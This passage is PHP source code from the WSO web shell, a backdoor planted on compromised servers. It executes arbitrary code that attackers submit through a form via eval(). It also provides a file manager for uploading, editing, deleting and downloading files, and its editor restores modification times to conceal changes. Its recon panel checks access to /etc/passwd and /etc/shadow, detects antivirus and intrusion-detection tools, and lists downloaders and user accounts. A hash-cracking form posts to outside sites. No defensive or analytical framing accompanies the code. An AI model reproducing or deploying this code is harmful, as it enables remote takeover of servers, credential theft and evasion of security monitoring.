  548.     $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-'));
  549.     $i .= (($p & 0x0004) ? 'r' : '-');
  550.     $i .= (($p & 0x0002) ? 'w' : '-');
  551.     $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-'));
  552.     return $i;
  553. }
  554. function wsoPermsColor($f)
  555. {
  556.     if (!@is_readable($f))
  557.         return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
  558.     elseif (!@is_writable($f))
  559.         return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>';
  560.     else
  561.         return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>';
  562. }
  563. if (!function_exists("scandir")) {
  564.     function scandir($dir)
  565.     {
  566.         $dh = opendir($dir);
  567.         while (false !== ($filename = readdir($dh)))
  568.             $files[] = $filename;
  569.         return $files;
  570.     }
  571. }
  572. function wsoWhich($p)
  573. {
  574.     $path = wsoEx('which ' . $p);
  575.     if (!empty($path))
  576.         return $path;
  577.     return false;
  578. }
  579. function actionSecInfo()
  580. {
  581.     wsoHeader();
  582.     echo '<h1>Server security information</h1><div class=content>';
  583.     function wsoSecParam($n, $v)
  584.     {
  585.         $v = trim($v);
  586.         if ($v) {
  587.             echo '<span>' . $n . ': </span>';
  588.             if (strpos($v, "\n") === false)
  589.                 echo $v . '<br>';
  590.             else
  591.                 echo '<pre class=ml1>' . $v . '</pre>';
  592.         }
  593.     }
  594.     wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
  595.     if (function_exists('apache_get_modules'))
  596.         wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
  597.     wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none');
  598.     wsoSecParam('Open base dir', @ini_get('open_basedir'));
  599.     wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
  600.     wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
  601.     wsoSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no');
  602.     $temp = array();
  603.     if (function_exists('mysql_get_client_info'))
  604.         $temp[] = "MySql (" . mysql_get_client_info() . ")";
  605.     if (function_exists('mssql_connect'))
  606.         $temp[] = "MSSQL";
  607.     if (function_exists('pg_connect'))
  608.         $temp[] = "PostgreSQL";
  609.     if (function_exists('oci_connect'))
  610.         $temp[] = "Oracle";
  611.     wsoSecParam('Supported databases', implode(', ', $temp));
  612.     echo '<br>';
  613.     if ($GLOBALS['os'] == 'nix') {
  614.         wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>" : 'no');
  615.         wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>" : 'no');
  616.         wsoSecParam('OS version', @file_get_contents('/proc/version'));
  617.         wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
  618.         if (!$GLOBALS['safe_mode']) {
  619.             $userful     = array(
  620.                 'gcc',
  621.                 'lcc',
  622.                 'cc',
  623.                 'ld',
  624.                 'make',
  625.                 'php',
  626.                 'perl',
  627.                 'python',
  628.                 'ruby',
  629.                 'tar',
  630.                 'gzip',
  631.                 'bzip',
  632.                 'bzip2',
  633.                 'nc',
  634.                 'locate',
  635.                 'suidperl'
  636.             );
  637.             $danger      = array(
  638.                 'kav',
  639.                 'nod32',
  640.                 'bdcored',
  641.                 'uvscan',
  642.                 'sav',
  643.                 'drwebd',
  644.                 'clamd',
  645.                 'rkhunter',
  646.                 'chkrootkit',
  647.                 'iptables',
  648.                 'ipfw',
  649.                 'tripwire',
  650.                 'shieldcc',
  651.                 'portsentry',
  652.                 'snort',
  653.                 'ossec',
  654.                 'lidsadm',
  655.                 'tcplodg',
  656.                 'sxid',
  657.                 'logcheck',
  658.                 'logwatch',
  659.                 'sysmask',
  660.                 'zmbscap',
  661.                 'sawmill',
  662.                 'wormscan',
  663.                 'ninja'
  664.             );
  665.             $downloaders = array(
  666.                 'wget',
  667.                 'fetch',
  668.                 'lynx',
  669.                 'links',
  670.                 'curl',
  671.                 'get',
  672.                 'lwp-mirror'
  673.             );
  674.             echo '<br>';
  675.             $temp = array();
  676.             foreach ($userful as $item)
  677.                 if (wsoWhich($item))
  678.                     $temp[] = $item;
  679.             wsoSecParam('Userful', implode(', ', $temp));
  680.             $temp = array();
  681.             foreach ($danger as $item)
  682.                 if (wsoWhich($item))
  683.                     $temp[] = $item;
  684.             wsoSecParam('Danger', implode(', ', $temp));
  685.             $temp = array();
  686.             foreach ($downloaders as $item)
  687.                 if (wsoWhich($item))
  688.                     $temp[] = $item;
  689.             wsoSecParam('Downloaders', implode(', ', $temp));
  690.             echo '<br/>';
  691.             wsoSecParam('HDD space', wsoEx('df -h'));
  692.             wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
  693.         }
  694.     } else {
  695.         wsoSecParam('OS Version', wsoEx('ver'));
  696.         wsoSecParam('Account Settings', wsoEx('net accounts'));
  697.         wsoSecParam('User Accounts', wsoEx('net user'));
  698.     }
  699.     echo '</div>';
  700.     wsoFooter();
  701. }
  702. function actionPhp()
  703. {
  704.     if (isset($_POST['ajax'])) {
  705.         $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = true;
  706.         ob_start();
  707.         eval($_POST['p1']);
  708.         $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n";
  709.         echo strlen($temp), "\n", $temp;
  710.         exit;
  711.     }
  712.     wsoHeader();
  713.     if (isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
  714.         echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
  715.         ob_start();
  716.         phpinfo();
  717.         $tmp = ob_get_clean();
  718.         $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', '', $tmp);
  719.         $tmp = preg_replace('!td, th {(.*)}!msiU', '.e, .v, .h, .h th {$1}', $tmp);
  720.         echo str_replace('<h1', '<h2', $tmp) . '</div><br>';
  721.     }
  722.     if (empty($_POST['ajax']) && !empty($_POST['p1']))
  723.         $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
  724.     echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>' . (!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') . '</textarea><input type=submit value=Eval style="margin-top:5px">';
  725.     echo ' <input type=checkbox name=ajax value=1 ' . ($_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX</form><pre id=PhpOutput style="' . (empty($_POST['p1']) ? 'display:none;' : '') . 'margin-top:5px;" class=ml1>';
  726.     if (!empty($_POST['p1'])) {
  727.         ob_start();
  728.         eval($_POST['p1']);
  729.         echo htmlspecialchars(ob_get_clean());
  730.     }
  731.     echo '</pre></div>';
  732.     wsoFooter();
  733. }
  734. function actionFilesMan()
  735. {
  736.     wsoHeader();
  737.     echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
  738.     if (!empty($_POST['p1'])) {
  739.         switch ($_POST['p1']) {
  740.             case 'uploadFile':
  741.                 if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
  742.                     echo "Can't upload file!";
  743.                 break;
  744.             case 'mkdir':
  745.                 if (!@mkdir($_POST['p2']))
  746.                     echo "Can't create new dir";
  747.                 break;
  748.             case 'delete':
  749.                 function deleteDir($path)
  750.                 {
  751.                     $path = (substr($path, -1) == '/') ? $path : $path . '/';
  752.                     $dh   = opendir($path);
  753.                     while (($item = readdir($dh)) !== false) {
  754.                         $item = $path . $item;
  755.                         if ((basename($item) == "..") || (basename($item) == "."))
  756.                             continue;
  757.                         $type = filetype($item);
  758.                         if ($type == "dir")
  759.                             deleteDir($item);
  760.                         else
  761.                             @unlink($item);
  762.                     }
  763.                     closedir($dh);
  764.                     @rmdir($path);
  765.                 }
  766.                 if (is_array(@$_POST['f']))
  767.                     foreach ($_POST['f'] as $f) {
  768.                         if ($f == '..')
  769.                             continue;
  770.                         $f = urldecode($f);
  771.                         if (is_dir($f))
  772.                             deleteDir($f);
  773.                         else
  774.                             @unlink($f);
  775.                     }
  776.                 break;
  777.             case 'paste':
  778.                 if ($_SESSION['act'] == 'copy') {
  779.                     function copy_paste($c, $s, $d)
  780.                     {
  781.                         if (is_dir($c . $s)) {
  782.                             mkdir($d . $s);
  783.                             $h = @opendir($c . $s);
  784.                             while (($f = @readdir($h)) !== false)
  785.                                 if (($f != ".") and ($f != ".."))
  786.                                     copy_paste($c . $s . '/', $f, $d . $s . '/');
  787.                         } elseif (is_file($c . $s))
  788.                             @copy($c . $s, $d . $s);
  789.                     }
  790.                     foreach ($_SESSION['f'] as $f)
  791.                         copy_paste($_SESSION['c'], $f, $GLOBALS['cwd']);
  792.                 } elseif ($_SESSION['act'] == 'move') {
  793.                     function move_paste($c, $s, $d)
  794.                     {
  795.                         if (is_dir($c . $s)) {
  796.                             mkdir($d . $s);
  797.                             $h = @opendir($c . $s);
  798.                             while (($f = @readdir($h)) !== false)
  799.                                 if (($f != ".") and ($f != ".."))
  800.                                     copy_paste($c . $s . '/', $f, $d . $s . '/');
  801.                         } elseif (@is_file($c . $s))
  802.                             @copy($c . $s, $d . $s);
  803.                     }
  804.                     foreach ($_SESSION['f'] as $f)
  805.                         @rename($_SESSION['c'] . $f, $GLOBALS['cwd'] . $f);
  806.                 } elseif ($_SESSION['act'] == 'zip') {
  807.                     if (class_exists('ZipArchive')) {
  808.                         $zip = new ZipArchive();
  809.                         if ($zip->open($_POST['p2'], 1)) {
  810.                             chdir($_SESSION['c']);
  811.                             foreach ($_SESSION['f'] as $f) {
  812.                                 if ($f == '..')
  813.                                     continue;
  814.                                 if (@is_file($_SESSION['c'] . $f))
  815.                                     $zip->addFile($_SESSION['c'] . $f, $f);
  816.                                 elseif (@is_dir($_SESSION['c'] . $f)) {
  817.                                     $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/'));
  818.                                     foreach ($iterator as $key => $value) {
  819.                                         $zip->addFile(realpath($key), $key);
  820.                                     }
  821.                                 }
  822.                             }
  823.                             chdir($GLOBALS['cwd']);
  824.                             $zip->close();
  825.                         }
  826.                     }
  827.                 } elseif ($_SESSION['act'] == 'unzip') {
  828.                     if (class_exists('ZipArchive')) {
  829.                         $zip = new ZipArchive();
  830.                         foreach ($_SESSION['f'] as $f) {
  831.                             if ($zip->open($_SESSION['c'] . $f)) {
  832.                                 $zip->extractTo($GLOBALS['cwd']);
  833.                                 $zip->close();
  834.                             }
  835.                         }
  836.                     }
  837.                 } elseif ($_SESSION['act'] == 'tar') {
  838.                     chdir($_SESSION['c']);
  839.                     $_SESSION['f'] = array_map('escapeshellarg', $_SESSION['f']);
  840.                     wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_SESSION['f']));
  841.                     chdir($GLOBALS['cwd']);
  842.                 }
  843.                 unset($_SESSION['f']);
  844.                 break;
  845.             default:
  846.                 if (!empty($_POST['p1'])) {
  847.                     $_SESSION['act'] = @$_POST['p1'];
  848.                     $_SESSION['f']   = @$_POST['f'];
  849.                     foreach ($_SESSION['f'] as $k => $f)
  850.                         $_SESSION['f'][$k] = urldecode($f);
  851.                     $_SESSION['c'] = @$_POST['c'];
  852.                 }
  853.                 break;
  854.         }
  855.     }
  856.     $dirContent = @scandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']);
  857.     if ($dirContent === false) {
  858.         echo 'Can\'t open this folder!';
  859.         wsoFooter();
  860.         return;
  861.     }
  862.     global $sort;
  863.     $sort = array(
  864.         'name',
  865.         1
  866.     );
  867.     if (!empty($_POST['p1'])) {
  868.         if (preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
  869.             $sort = array(
  870.                 $match[1],
  871.                 (int) $match[2]
  872.             );
  873.     }
  874.     echo "<script>
  875.         function sa() {
  876.                 for(i=0;i<d.files.elements.length;i++)
  877.                         if(d.files.elements[i].type == 'checkbox')
  878.                                 d.files.elements[i].checked = d.files.elements[0].checked;
  879.         }
  880. </script>
  881. <table width='100%' class='main' cellspacing='0' cellpadding='2'>
  882. <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th><th>Actions</th></tr>";
  883.     $dirs = $files = array();
  884.     $n    = count($dirContent);
  885.     for ($i = 0; $i < $n; $i++) {
  886.         $ow  = @posix_getpwuid(@fileowner($dirContent[$i]));
  887.         $gr  = @posix_getgrgid(@filegroup($dirContent[$i]));
  888.         $tmp = array(
  889.             'name' => $dirContent[$i],
  890.             'path' => $GLOBALS['cwd'] . $dirContent[$i],
  891.             'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
  892.             'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
  893.             'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]),
  894.             'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]),
  895.             'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i])
  896.         );
  897.         if (@is_file($GLOBALS['cwd'] . $dirContent[$i]))
  898.             $files[] = array_merge($tmp, array(
  899.                 'type' => 'file'
  900.             ));
  901.         elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i]))
  902.             $dirs[] = array_merge($tmp, array(
  903.                 'type' => 'link',
  904.                 'link' => readlink($tmp['path'])
  905.             ));
  906.         elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i]) && ($dirContent[$i] != "."))
  907.             $dirs[] = array_merge($tmp, array(
  908.                 'type' => 'dir'
  909.             ));
  910.     }
  911.     $GLOBALS['sort'] = $sort;
  912.     function wsoCmp($a, $b)
  913.     {
  914.         if ($GLOBALS['sort'][0] != 'size')
  915.             return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1);
  916.         else
  917.             return (($a['size'] < $b['size']) ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1);
  918.     }
  919.     usort($files, "wsoCmp");
  920.     usort($dirs, "wsoCmp");
  921.     $files = array_merge($dirs, $files);
  922.     $l     = 0;
  923.     foreach ($files as $f) {
  924.         echo '<tr' . ($l ? ' class=l1' : '') . '><td><input type=checkbox name="f[]" value="' . urlencode($f['name']) . '" class=chkbx></td><td><a href=# onclick="' . (($f['type'] == 'file') ? 'g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" title=' . $f['link'] . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') . '</a></td><td>' . (($f['type'] == 'file') ? wsoViewSize($f['size']) : $f['type']) . '</td><td>' . $f['modify'] . '</td><td>' . $f['owner'] . '/' . $f['group'] . '</td><td><a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</td><td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . (($f['type'] == 'file') ? ' <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td></tr>';
  925.         $l = $l ? 0 : 1;
  926.     }
  927.     echo "<tr><td colspan=7>
  928.         <input type=hidden name=a value='FilesMan'>
  929.         <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'>
  930.         <input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
  931.         <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
  932.     if (class_exists('ZipArchive'))
  933.         echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
  934.     echo "<option value='tar'>Compress (tar.gz)</option>";
  935.     if (!empty($_SESSION['act']) && @count($_SESSION['f']))
  936.         echo "<option value='paste'>Paste / Compress</option>";
  937.     echo "</select>&nbsp;";
  938.     if (!empty($_SESSION['act']) && @count($_SESSION['f']) && (($_SESSION['act'] == 'zip') || ($_SESSION['act'] == 'tar')))
  939.         echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_SESSION['act'] == 'zip' ? 'zip' : 'tar.gz') . "'>&nbsp;";
  940.     echo "<input type='submit' value='>>'></td></tr></form></table></div>";
  941.     wsoFooter();
  942. }
  943. function actionStringTools()
  944. {
  945.     if (!function_exists('hex2bin')) {
  946.         function hex2bin($p)
  947.         {
  948.             return decbin(hexdec($p));
  949.         }
  950.     }
  951.     if (!function_exists('binhex')) {
  952.         function binhex($p)
  953.         {
  954.             return dechex(bindec($p));
  955.         }
  956.     }
  957.     if (!function_exists('hex2ascii')) {
  958.         function hex2ascii($p)
  959.         {
  960.             $r = '';
  961.             for ($i = 0; $i < strLen($p); $i += 2) {
  962.                 $r .= chr(hexdec($p[$i] . $p[$i + 1]));
  963.             }
  964.             return $r;
  965.         }
  966.     }
  967.     if (!function_exists('ascii2hex')) {
  968.         function ascii2hex($p)
  969.         {
  970.             $r = '';
  971.             for ($i = 0; $i < strlen($p); ++$i)
  972.                 $r .= sprintf('%02X', ord($p[$i]));
  973.             return strtoupper($r);
  974.         }
  975.     }
  976.     if (!function_exists('full_urlencode')) {
  977.         function full_urlencode($p)
  978.         {
  979.             $r = '';
  980.             for ($i = 0; $i < strlen($p); ++$i)
  981.                 $r .= '%' . dechex(ord($p[$i]));
  982.             return strtoupper($r);
  983.         }
  984.     }
  985.     $stringTools = array(
  986.         'Base64 encode' => 'base64_encode',
  987.         'Base64 decode' => 'base64_decode',
  988.         'Url encode' => 'urlencode',
  989.         'Url decode' => 'urldecode',
  990.         'Full urlencode' => 'full_urlencode',
  991.         'md5 hash' => 'md5',
  992.         'sha1 hash' => 'sha1',
  993.         'crypt' => 'crypt',
  994.         'CRC32' => 'crc32',
  995.         'ASCII to HEX' => 'ascii2hex',
  996.         'HEX to ASCII' => 'hex2ascii',
  997.         'HEX to DEC' => 'hexdec',
  998.         'HEX to BIN' => 'hex2bin',
  999.         'DEC to HEX' => 'dechex',
  1000.         'DEC to BIN' => 'decbin',
  1001.         'BIN to HEX' => 'binhex',
  1002.         'BIN to DEC' => 'bindec',
  1003.         'String to lower case' => 'strtolower',
  1004.         'String to upper case' => 'strtoupper',
  1005.         'Htmlspecialchars' => 'htmlspecialchars',
  1006.         'String length' => 'strlen'
  1007.     );
  1008.     if (isset($_POST['ajax'])) {
  1009.         $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = true;
  1010.         ob_start();
  1011.         if (in_array($_POST['p1'], $stringTools))
  1012.             echo $_POST['p1']($_POST['p2']);
  1013.         $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n";
  1014.         echo strlen($temp), "\n", $temp;
  1015.         exit;
  1016.     }
  1017.     wsoHeader();
  1018.     echo '<h1>String conversions</h1><div class=content>';
  1019.     if (empty($_POST['ajax']) && !empty($_POST['p1']))
  1020.         $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
  1021.     echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
  1022.     foreach ($stringTools as $k => $v)
  1023.         echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>";
  1024.     echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . (@$_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2'])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;' : '') . "margin-top:5px' id='strOutput'>";
  1025.     if (!empty($_POST['p1'])) {
  1026.         if (in_array($_POST['p1'], $stringTools))
  1027.             echo htmlspecialchars($_POST['p1']($_POST['p2']));
  1028.     }
  1029.     echo "</pre></div><br><h1>Search text in files:</h1><div class=content>
  1030.                 <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
  1031.                         <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
  1032.                         <tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS['cwd']) . "' style='width:100%'></td></tr>
  1033.                         <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
  1034.                         <tr><td></td><td><input type='submit' value='>>'></td></tr>
  1035.                         </table></form>";
  1036.     function wsoRecursiveGlob($path)
  1037.     {
  1038.         if (substr($path, -1) != '/')
  1039.             $path .= '/';
  1040.         $paths = @array_unique(@array_merge(@glob($path . $_POST['p3']), @glob($path . '*', GLOB_ONLYDIR)));
  1041.         if (is_array($paths) && @count($paths)) {
  1042.             foreach ($paths as $item) {
  1043.                 if (@is_dir($item)) {
  1044.                     if ($path != $item)
  1045.                         wsoRecursiveGlob($item);
  1046.                 } else {
  1047.                     if (@strpos(@file_get_contents($item), @$_POST['p2']) !== false)
  1048.                         echo "<a href='#' onclick='g(\"FilesTools\",null,\"" . urlencode($item) . "\", \"view\")'>" . htmlspecialchars($item) . "</a><br>";
  1049.                 }
  1050.             }
  1051.         }
  1052.     }
  1053.     if (@$_POST['p3'])
  1054.         wsoRecursiveGlob($_POST['c']);
  1055.     echo "</div><br><h1>Search for hash:</h1><div class=content>
  1056.                 <form method='post' target='_blank' name='hf'>
  1057.                         <input type='text' name='hash' style='width:200px;'><br>
  1058.                         <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
  1059.                         <input type='button' value='milw0rm.com' onclick=\"document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()\"><br>
  1060.                         <input type='button' value='hashcracking.info' onclick=\"document.hf.action='https://hashcracking.info/index.php';document.hf.submit()\"><br>
  1061.                         <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
  1062.                         <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
  1063.                 </form></div>";
  1064.     wsoFooter();
  1065. }
  1066. function actionFilesTools()
  1067. {
  1068.     if (isset($_POST['p1']))
  1069.         $_POST['p1'] = urldecode($_POST['p1']);
  1070.     if (@$_POST['p2'] == 'download') {
  1071.         if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
  1072.             ob_start("ob_gzhandler", 4096);
  1073.             header("Content-Disposition: attachment; filename=" . basename($_POST['p1']));
  1074.             if (function_exists("mime_content_type")) {
  1075.                 $type = @mime_content_type($_POST['p1']);
  1076.                 header("Content-Type: " . $type);
  1077.             } else
  1078.                 header("Content-Type: application/octet-stream");
  1079.             $fp = @fopen($_POST['p1'], "r");
  1080.             if ($fp) {
  1081.                 while (!@feof($fp))
  1082.                     echo @fread($fp, 1024);
  1083.                 fclose($fp);
  1084.             }
  1085.         }
  1086.         exit;
  1087.     }
  1088.     if (@$_POST['p2'] == 'mkfile') {
  1089.         if (!file_exists($_POST['p1'])) {
  1090.             $fp = @fopen($_POST['p1'], 'w');
  1091.             if ($fp) {
  1092.                 $_POST['p2'] = "edit";
  1093.                 fclose($fp);
  1094.             }
  1095.         }
  1096.     }
  1097.     wsoHeader();
  1098.     echo '<h1>File tools</h1><div class=content>';
  1099.     if (!file_exists(@$_POST['p1'])) {
  1100.         echo 'File not exists';
  1101.         wsoFooter();
  1102.         return;
  1103.     }
  1104.     $uid = @posix_getpwuid(@fileowner($_POST['p1']));
  1105.     if (!$uid) {
  1106.         $uid['name'] = @fileowner($_POST['p1']);
  1107.         $gid['name'] = @filegroup($_POST['p1']);
  1108.     } else
  1109.         $gid = @posix_getgrgid(@filegroup($_POST['p1']));
  1110.     echo '<span>Name:</span> ' . htmlspecialchars(@basename($_POST['p1'])) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ? wsoViewSize(filesize($_POST['p1'])) : '-') . ' <span>Permission:</span> ' . wsoPermsColor($_POST['p1']) . ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br>';
  1111.     echo '<span>Create time:</span> ' . date('Y-m-d H:i:s', filectime($_POST['p1'])) . ' <span>Access time:</span> ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])) . ' <span>Modify time:</span> ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])) . '<br><br>';
  1112.     if (empty($_POST['p2']))
  1113.         $_POST['p2'] = 'view';
  1114.     if (is_file($_POST['p1']))
  1115.         $m = array(
  1116.             'View',
  1117.             'Highlight',
  1118.             'Download',
  1119.             'Hexdump',
  1120.             'Edit',
  1121.             'Chmod',
  1122.             'Rename',
  1123.             'Touch'
  1124.         );
  1125.     else
  1126.         $m = array(
  1127.             'Chmod',
  1128.             'Rename',
  1129.             'Touch'
  1130.         );
  1131.     foreach ($m as $v)
  1132.         echo '<a href=# onclick="g(null,null,null,\'' . strtolower($v) . '\')">' . ((strtolower($v) == @$_POST['p2']) ? '<b>[ ' . $v . ' ]</b>' : $v) . '</a> ';
  1133.     echo '<br><br>';
  1134.     switch ($_POST['p2']) {
  1135.         case 'view':
  1136.             echo '<pre class=ml1>';
  1137.             $fp = @fopen($_POST['p1'], 'r');
  1138.             if ($fp) {
  1139.                 while (!@feof($fp))
  1140.                     echo htmlspecialchars(@fread($fp, 1024));
  1141.                 @fclose($fp);
  1142.             }
  1143.             echo '</pre>';
  1144.             break;
  1145.         case 'highlight':
  1146.             if (@is_readable($_POST['p1'])) {
  1147.                 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
  1148.                 $code = @highlight_file($_POST['p1'], true);
  1149.                 echo str_replace(array(
  1150.                     '<span ',
  1151.                     '</span>'
  1152.                 ), array(
  1153.                     '<font ',
  1154.                     '</font>'
  1155.                 ), $code) . '</div>';
  1156.             }
  1157.             break;
  1158.         case 'chmod':
  1159.             if (!empty($_POST['p3'])) {
  1160.                 $perms = 0;
  1161.                 for ($i = strlen($_POST['p3']) - 1; $i >= 0; --$i)
  1162.                     $perms += (int) $_POST['p3'][$i] * pow(8, (strlen($_POST['p3']) - $i - 1));
  1163.                 if (!@chmod($_POST['p1'], $perms))
  1164.                     echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
  1165.             }
  1166.             clearstatcache();
  1167.             echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])), -4) . '"><input type=submit value=">>"></form>';
  1168.             break;
  1169.         case 'edit':
  1170.             if (!is_writable($_POST['p1'])) {
  1171.                 echo 'File isn\'t writeable';
  1172.                 break;
  1173.             }
  1174.             if (!empty($_POST['p3'])) {
  1175.                 $time        = @filemtime($_POST['p1']);
  1176.                 $_POST['p3'] = substr($_POST['p3'], 1);
  1177.                 $fp          = @fopen($_POST['p1'], "w");
  1178.                 if ($fp) {
  1179.                     @fwrite($fp, $_POST['p3']);
  1180.                     @fclose($fp);
  1181.                     echo 'Saved!<br><script>p3_="";</script>';
  1182.                     @touch($_POST['p1'], $time, $time);
  1183.                 }
  1184.             }
  1185.             echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
  1186.             $fp = @fopen($_POST['p1'], 'r');
  1187.             if ($fp) {
  1188.                 while (!@feof($fp))
  1189.                     echo htmlspecialchars(@fread($fp, 1024));
  1190.                 @fclose($fp);
  1191.             }
  1192.             echo '</textarea><input type=submit value=">>"></form>';
  1193.             break;
  1194.         case 'hexdump':
  1195.             $c   = @file_get_contents($_POST['p1']);
  1196.             $n   = 0;
  1197.             $h   = array(
  1198.                 '00000000<br>',
  1199.                 '',
  1200.                 ''
  1201.             );
  1202.             $len = strlen($c);
  1203.             for ($i = 0; $i < $len; ++$i) {
  1204.                 $h[1] .= sprintf('%02X', ord($c[$i])) . ' ';
  1205.                 switch (ord($c[$i])) {
  1206.                     case 0:
  1207.                         $h[2] .= ' ';
  1208.                         break;
  1209.                     case 9:
